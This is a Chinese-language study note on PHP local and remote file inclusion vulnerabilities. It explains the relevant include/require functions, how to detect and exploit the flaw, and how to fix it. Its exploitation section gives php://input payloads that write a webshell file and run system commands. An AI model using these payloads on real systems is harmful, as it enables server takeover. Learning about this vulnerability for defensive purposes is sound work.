参考文章
本片文章仅供学习使用,切勿触犯法律!
概述
总结
一、漏洞介绍
在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。
二、漏洞原理
大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。
PHP常见的导致文件包含的函数如下:include(),include_once(),require(),require_once(),fopen(),readfile()
当使用前4个函数包含一个新的文件时,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。包含非PHP语法规范源文件时,将会暴露其源代码。
| 函数 | 包含失败 | 特点 |
|---|---|---|
| Inlcude | 返回一条警告 | 文件继续向下执行。通常用于动态包含 |
| Require | 一个致命的错 | 代码就不会继续向下执行。通常包含极为重要的文件,整个代码甭想执行 |
| Include_once | 返回一条警告 | 除了原有include的功能以外,它还会做once检测,如果文件曾经已经被被包含过,不再包含 |
| Require_once | 一个致命的错 | 除了原功能以外,会做一次once检测,防止文件反复被包含 |
三、漏洞危害
- 敏感信息泄露
- 拒绝服务攻击
- 执行恶意代码
- 配合文件上传,扩大危害
一般来说,远程文件包含漏洞危害更大。
四、利用前提
- Web应采用include()等文件包含函数通过动态变量的方式引入需要包含的文件.
- 用户能够控制该动态变量
五、挖掘利用
1、本地文件包含漏洞
1.描述
仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。
2.挖掘
抓包观察有无明显的参数用于打开或使用文件,在漏洞挖掘过程中,注意下即可。如果遇到疑似文件包含,可以使用以下的测试方法。(因为不知道对参数有何处理,所以,该方法并不准确)
a.php是fileinclude.php的同一目录的文件
http://www.aaa.com/fileinclude.php?file=file://a.php
打开目标网站,一般不会被过滤掉
http://www.aaa.com/fileinclude.php?file=http://www.aaa.com
3.利用
利用php伪协议读取敏感文件,详情请见[[008.win-敏感文件]]、[[lin-敏感文件]]、[[019.支持的协议和封装协议]]
常见的如:
file://
http://
php://
等等
2、远程文件包含漏洞
1.描述
能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,比本地文件包含漏洞更加严重
利用远程文件包含漏洞需要使allow_url_include为on
2.挖掘
挖掘过程同上,另外,还需要测试能否包含远程文件,故:
http://www.aaa.com/fileinclude.php?file=https://www.baidu.com
用样的,因为不知道对参数的过滤方式,因此该方法不一定成功。
3.利用
- 读取敏感文件
- 详情请见[[008.win-敏感文件]] [[lin-敏感文件]]
- 远程包含shell
- 插入一句话等,详情请见
- 配合文件上传
- 详情请见[[文件上传漏洞]]
这里举出几个常用的例子:
增加代码
在file.php所在文件下的文件shell.php内增加<?php phpinfo();?>
URL:
http://localhost/include/file.php?file=php://input 怎么用??
POST:
<?php fputs(fopen("shell.php","a"),"<?php phpinfo();?>") ?>
增加文件
通过fopen参数为w,可新建一个文件,并在新建的文件shell.php中写入<?php phpinfo();?>
URL:
http://localhost/include/file.php?file=php://input
POST:
<?php fputs(fopen("shell.php","w"),"<?php phpinfo();?>") ?>
执行命令
通过php的系统执行函数,将执行命令写入到文件中,并且执行系统命令
URL:
http://localhost/include/file.php?file=php://input
POST:
<?php system('ipconfig');?>
六、修复防范
- PHP:配置php.ini关闭远程文件包含功能(allow_url_include = Off)
- 严格检查变量是否已经初始化。
- 建议假定所有输入都是可疑的,尝试对所有输入提交可能可能包含的文件地址,包括服务器本地文件及远程文件,进行严格的检查,参数中不允许出现../之类的目录跳转符。
- 严格检查include类的文件包含函数中的参数是否外界可控。
- 不要仅仅在客户端做数据的验证与过滤,关键的过滤步骤在服务端进行。
- 在发布应用程序之前测试所有已知的威胁。
- 路径限制:限制被包含的文件只能在某一文件夹内,一定要禁止目录跳转字符,如:“../”;
- 包含文件验证:验证被包含的文件是否是白名单中的一员;
- 尽量不要使用动态包含,可以在需要包含的页面固定写好,如:include("head.php");,不要把被包含的写成变量。
七、提出问题
在文件包含漏洞利用还是不太清楚。